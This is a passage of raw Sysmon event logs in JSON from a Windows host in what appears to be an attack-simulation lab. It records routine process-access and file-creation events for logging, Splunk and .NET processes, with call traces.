(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7568,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.699\r\nSourceProcessGUID: {E2A3D6B1-132C-5F25-0000-001073910B00}\r\nSourceProcessId: 3468\r\nSourceThreadId: 4092\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.699","SourceProcessGUID":"{E2A3D6B1-132C-5F25-0000-001073910B00}","SourceProcessId":"3468","SourceThreadId":"4092","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7569,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:01.559\r\nProcessGuid: {E2A3D6B1-132C-5F25-0000-00104C8E0B00}\r\nProcessId: 5092\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13e4-0\\Microsoft.Build.Engine.dll\r\nCreationUtcTime: 2020-08-01 07:01:01.559","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:01.559","ProcessGuid":"{E2A3D6B1-132C-5F25-0000-00104C8E0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13e4-0\\Microsoft.Build.Engine.dll","CreationUtcTime":"2020-08-01 07:01:01.559","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7570,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7571,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.621\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132D-5F25-0000-0010F0940B00}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.621","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132D-5F25-0000-0010F0940B00}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7572,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.621\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132D-5F25-0000-0010F0940B00}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.621","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132D-5F25-0000-0010F0940B00}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7573,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.621\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132D-5F25-0000-0010F0940B00}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.621","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132D-5F25-0000-0010F0940B00}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7574,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.652\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010EF410B00}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.652","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010EF410B00}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7575,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.652\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010EF410B00}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.652","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010EF410B00}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
